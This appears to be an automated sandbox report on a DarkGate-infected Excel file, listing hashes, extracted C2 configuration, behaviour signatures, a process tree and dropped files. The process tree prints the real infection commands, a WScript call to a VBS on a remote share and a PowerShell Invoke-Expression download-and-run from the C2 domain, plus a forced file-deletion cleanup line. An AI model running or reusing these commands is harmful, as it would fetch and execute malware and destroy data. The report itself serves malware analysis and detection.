Analysis

  • max time kernel
    531s
  • max time network
    478s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240221-en
  • resource tags

    arch:x64arch:x86image:win11-20240221-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    27-02-2024 15:24

General

  • Target

    scanned_doc#2024-27-2_6645.xlsx

  • Size

    55KB

  • MD5

    eedb87b1913b5b1bd864fedb04f30e9d

  • SHA1

    6e7bf83d38e1672a6f15979effa76e659af7d7ec

  • SHA256

    ca497dd08e13d2276d2ec99a0edd71e1283d00d2260b8d59a6eb6a25193b7113

  • SHA512

    131d8d9446103058a021a01b6c4569026be959370cf1bb35b5bb5900fd9a96064992e3121d7c8742b01c7f68fadc9c9db3eec8946440f5032c9985eae8da8255

  • SSDEEP

    1536:p/ToOEjzAw7Y2r7DUsV4XzY9t3jSagJYwehDC:BoOAcw7nXDUsOjm3jTxhDC

Malware Config

Extracted

Family

darkgate

Botnet

admin888

C2

remasterprodelherskjs.com

Attributes
  • anti_analysis

    false

  • anti_debug

    false

  • anti_vm

    false

  • c2_port

    80

  • check_disk

    false

  • check_ram

    false

  • check_xeon

    false

  • crypter_au3

    false

  • crypter_dll

    false

  • crypter_raw_stub

    false

  • internal_mutex

    PAuTCBnH

  • minimum_disk

    50

  • minimum_ram

    7000

  • ping_interval

    6

  • rootkit

    false

  • startup_persistence

    true

  • username

    admin888

Signatures

  • DarkGate

    DarkGate is an infostealer written in C++.

  • Detect DarkGate stealer 14 IoCs
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 9 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 17 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 15 IoCs
  • Suspicious use of WriteProcessMemory 21 IoCs

Processes

  • C:\Windows\sysmon.exe
    C:\Windows\sysmon.exe
    1⤵
      PID:2636
      • C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdateCore.exe
        "C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdateCore.exe"
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Checks processor information in registry
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: GetForegroundWindowSpam
        • Suspicious use of WriteProcessMemory
        PID:3300
        • \??\c:\windows\SysWOW64\cmd.exe
          "c:\windows\system32\cmd.exe" /c ping 127.0.0.1 & del /q /f /s c:\temp & del /q /f /s C:\ProgramData\abhfedb\ & rmdir /s /q C:\ProgramData\abhfedb\
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2824
          • \??\c:\windows\SysWOW64\PING.EXE
            ping 127.0.0.1
            4⤵
            • Runs ping.exe
            PID:1176
      • C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdateCore.exe
        "C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdateCore.exe"
        2⤵
        • Checks processor information in registry
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: GetForegroundWindowSpam
        PID:3332
    • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
      "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\scanned_doc#2024-27-2_6645.xlsx"
      1⤵
      • Checks processor information in registry
      • Enumerates system info in registry
      • Suspicious behavior: AddClipboardFormatListener
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:3772
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "\\147.45.197.186\share\yellow.vbs"
        2⤵
        • Process spawned unexpected child process
        • Suspicious use of WriteProcessMemory
        PID:4512
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (Invoke-RestMethod -Uri 'remasterprodelherskjs.com/wzglcrnu')
          3⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4204
          • C:\temp\AutoIt3.exe
            "C:\temp\AutoIt3.exe" script.a3x
            4⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Executes dropped EXE
            • Checks processor information in registry
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:1316

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\ProgramData\abhfedb\cbbaebc

      Filesize

      1KB

      MD5

      5da1a534a2378d3b8c4ba75f7dec8086

      SHA1

      a444e90b3f7455d922346d689c565a462cb62f3d

      SHA256

      60cb910f7a4b23ab2d05f85f1f6cf60d9654352f61f422548df0fab29229707e

      SHA512

      e9e2bdbc812649b2e74aaa5713c3ae01119119ba827b36a05c6ecb727af49317fc0800584dff3f213bb742481b8f9fe8bdb0ed6d3166f177ad0c1b5798df814d

    • C:\ProgramData\abhfedb\haebbbc.a3x

      Filesize

      471KB

      MD5

      589f36f1ede969f8e54e6d2398e48bf2

      SHA1

      a5bfbe7ef10416bd36826f1fc5cb6c0832cbd08c

      SHA256

      1735ceb79a6ab15ccd12e34da39727e2c92e468e07c8d49c2bda36dd2514ab08

      SHA512

      4a0298e7b54d6bfababe94805b67ae173b84799573934d2ee8225bb3a24ae3de4491e8387b6b3217fbfa80157d1ab75456285f9c29b3f61ef02219bbe437f75c

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mpeggwzm.3si.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Roaming\HhddfDD

      Filesize

      32B

      MD5

      6e728bb0ed5ff8bc2782112515927ba0

      SHA1

      67b01195c26f7934bb2de85f0250050b2f5849e0

      SHA256

      3f0e3e88a3b219d24be96bb595157443c050a68f85d1e8306c290cdff9ee4134

      SHA512

      bfbb0218dc248eb1dfe16d33670743aae211ed6b0e1ae62af161cd5c7c0b4c991f816c04f60c33a437525f47241581b750e2cfd1f9d9cc9a8dbdfeffec919d39

    • C:\temp\AutoIt3.exe

      Filesize

      872KB

      MD5

      c56b5f0201a3b3de53e561fe76912bfd

      SHA1

      2a4062e10a5de813f5688221dbeb3f3ff33eb417

      SHA256

      237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

      SHA512

      195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

    • C:\temp\cbeaabf

      Filesize

      4B

      MD5

      7376d25771fdf78adae67f6b72afdb0d

      SHA1

      c522b72845b17d0ebdf6e6269a08c2d622841157

      SHA256

      78a5d6046791961e1cd0812a3881de786ef2ecdb40955f9598d922722ada5fdf

      SHA512

      bd43ff253e9feb72043a172d9796c9fca60e1cc09f99f0cf04b160680e74fb7626c5c25281d03dfb9885080275c26e517c499345130a4e6c6661df2c4949fef5

    • C:\temp\cbeaabf

      Filesize

      4B

      MD5

      8a0bf1e3994003ac1c87752c6249ddbf

      SHA1

      1419e543e186b8b44689b5c7d0a3227652ccf0d1

      SHA256

      df7bb35d8b030d452ad829aa5ab3d098b2098de3827bc29a107de8fff9544eca

      SHA512

      c2dab769e156eab4050db0404cac7cec437ea4b55473ea5423bb2ed78d6e763f454e9457dab417bf73552c3f0e41654876fbc2717e521c5334b8501550a0215d

    • C:\temp\hhakbch

      Filesize

      4B

      MD5

      6eeb3608ab26836c60cfe9c1910103c2

      SHA1

      c8fa89eab26128bc0a801eea339fa27acd307a40

      SHA256

      9cae0c3437a5fa5743bd40b4aacc1784f0f14511a3973885f0d6f33e4c26f288

      SHA512

      d73cff64c36fd650b7907b150901d346807e1b4984cbab8c7d12afb39a8487a97fd735ba48319676af025472ebba63cbc88dc9913042fcad82943c89a3f65a23

    • C:\temp\script.a3x

      Filesize

      469KB

      MD5

      fed1cada5e6082bc1393036555d061b9

      SHA1

      37b1a821af0e64104c9ffcb8fa39ab4d78c7374d

      SHA256

      2c8ddb6ee845e48c776da5e06cbaf4529b5909384e4786f533d6dd3b679d295c

      SHA512

      6d0fa057c3a1a9aaf39a6fe596d5a12a5f5689dc48811c2e09c001e63f9712e9103d2d21c6afb1d4321823bf6c78263818695e3c8f821f39ad2f4d89404bf630

    • C:\temp\test.txt

      Filesize

      76B

      MD5

      84daf31ae22d4a6a40b0fffda6ea2995

      SHA1

      7912e09030e200187682f5253068b27fd824faf2

      SHA256

      c490210dba7ecd1a4987d4dab36d3f6d5a0a1a7eaf47f1e3cf0f93dd4244e65d

      SHA512

      69210ed3bb6ee8aa0e7a8a5d148774aaae4e58390736354f5ac1ed5919714778234a3d79358dc6299bdcd12a754adbdadee17b4349061107981d865b84245f46

    • \??\c:\temp\ahagagf

      Filesize

      4B

      MD5

      c951355d967a84bf1b2fd73de6b9f79e

      SHA1

      fa578c6b8ca0173a0cf8f76d1b291fd519a66b5e

      SHA256

      639bad206c6724ac8a56248de312949739815a61450d1dd05f26934f6640902c

      SHA512

      475403c415b4cc62dce962e7f5b6f55301f7caa9d2a72f60ea0b357159ac3fea8692101290c93a86d0e9dc390d1d5f7cdf8fe698cc89c974874452408c0dc53d

    • memory/1316-62-0x0000000005AB0000-0x0000000005DFF000-memory.dmp

      Filesize

      3.3MB

    • memory/1316-73-0x0000000005AB0000-0x0000000005DFF000-memory.dmp

      Filesize

      3.3MB

    • memory/1316-61-0x00000000045B0000-0x0000000005580000-memory.dmp

      Filesize

      15.8MB

    • memory/3300-89-0x0000000002E90000-0x0000000003632000-memory.dmp

      Filesize

      7.6MB

    • memory/3300-77-0x0000000002E90000-0x0000000003632000-memory.dmp

      Filesize

      7.6MB

    • memory/3300-83-0x0000000002E90000-0x0000000003632000-memory.dmp

      Filesize

      7.6MB

    • memory/3300-84-0x0000000002E90000-0x0000000003632000-memory.dmp

      Filesize

      7.6MB

    • memory/3300-72-0x0000000002E90000-0x0000000003632000-memory.dmp

      Filesize

      7.6MB

    • memory/3300-85-0x0000000002E90000-0x0000000003632000-memory.dmp

      Filesize

      7.6MB

    • memory/3300-86-0x0000000002E90000-0x0000000003632000-memory.dmp

      Filesize

      7.6MB

    • memory/3300-95-0x0000000002E90000-0x0000000003632000-memory.dmp

      Filesize

      7.6MB

    • memory/3332-88-0x00000000029F0000-0x0000000003192000-memory.dmp

      Filesize

      7.6MB

    • memory/3332-82-0x00000000029F0000-0x0000000003192000-memory.dmp

      Filesize

      7.6MB

    • memory/3332-90-0x00000000029F0000-0x0000000003192000-memory.dmp

      Filesize

      7.6MB

    • memory/3332-94-0x00000000029F0000-0x0000000003192000-memory.dmp

      Filesize

      7.6MB

    • memory/3772-12-0x00007FFAFF2A0000-0x00007FFAFF4A9000-memory.dmp

      Filesize

      2.0MB

    • memory/3772-9-0x00007FFAFF2A0000-0x00007FFAFF4A9000-memory.dmp

      Filesize

      2.0MB

    • memory/3772-39-0x00007FFAFE600000-0x00007FFAFE6BD000-memory.dmp

      Filesize

      756KB

    • memory/3772-1-0x00007FFAFF2A0000-0x00007FFAFF4A9000-memory.dmp

      Filesize

      2.0MB

    • memory/3772-2-0x00007FFABF330000-0x00007FFABF340000-memory.dmp

      Filesize

      64KB

    • memory/3772-38-0x00007FFAFF2A0000-0x00007FFAFF4A9000-memory.dmp

      Filesize

      2.0MB

    • memory/3772-3-0x00007FFABF330000-0x00007FFABF340000-memory.dmp

      Filesize

      64KB

    • memory/3772-7-0x00007FFABF330000-0x00007FFABF340000-memory.dmp

      Filesize

      64KB

    • memory/3772-6-0x00007FFAFF2A0000-0x00007FFAFF4A9000-memory.dmp

      Filesize

      2.0MB

    • memory/3772-5-0x00007FFABF330000-0x00007FFABF340000-memory.dmp

      Filesize

      64KB

    • memory/3772-25-0x00007FFAFF2A0000-0x00007FFAFF4A9000-memory.dmp

      Filesize

      2.0MB

    • memory/3772-24-0x00007FFAFF2A0000-0x00007FFAFF4A9000-memory.dmp

      Filesize

      2.0MB

    • memory/3772-16-0x00007FFAFE600000-0x00007FFAFE6BD000-memory.dmp

      Filesize

      756KB

    • memory/3772-15-0x00007FFABCEB0000-0x00007FFABCEC0000-memory.dmp

      Filesize

      64KB

    • memory/3772-14-0x00007FFAFF2A0000-0x00007FFAFF4A9000-memory.dmp

      Filesize

      2.0MB

    • memory/3772-0-0x00007FFABF330000-0x00007FFABF340000-memory.dmp

      Filesize

      64KB

    • memory/3772-13-0x00007FFAFE600000-0x00007FFAFE6BD000-memory.dmp

      Filesize

      756KB

    • memory/3772-11-0x00007FFABCEB0000-0x00007FFABCEC0000-memory.dmp

      Filesize

      64KB

    • memory/3772-10-0x00007FFAFF2A0000-0x00007FFAFF4A9000-memory.dmp

      Filesize

      2.0MB

    • memory/3772-4-0x00007FFAFF2A0000-0x00007FFAFF4A9000-memory.dmp

      Filesize

      2.0MB

    • memory/3772-8-0x00007FFAFF2A0000-0x00007FFAFF4A9000-memory.dmp

      Filesize

      2.0MB

    • memory/4204-41-0x00000241FE270000-0x00000241FE432000-memory.dmp

      Filesize

      1.8MB

    • memory/4204-26-0x00000241FDA50000-0x00000241FDA72000-memory.dmp

      Filesize

      136KB

    • memory/4204-35-0x00007FFAD4E40000-0x00007FFAD5902000-memory.dmp

      Filesize

      10.8MB

    • memory/4204-36-0x00000241FDA90000-0x00000241FDAA0000-memory.dmp

      Filesize

      64KB

    • memory/4204-37-0x00000241FDA90000-0x00000241FDAA0000-memory.dmp

      Filesize

      64KB

    • memory/4204-57-0x00007FFAD4E40000-0x00007FFAD5902000-memory.dmp

      Filesize

      10.8MB

    • memory/4204-40-0x00000241FDA90000-0x00000241FDAA0000-memory.dmp

      Filesize

      64KB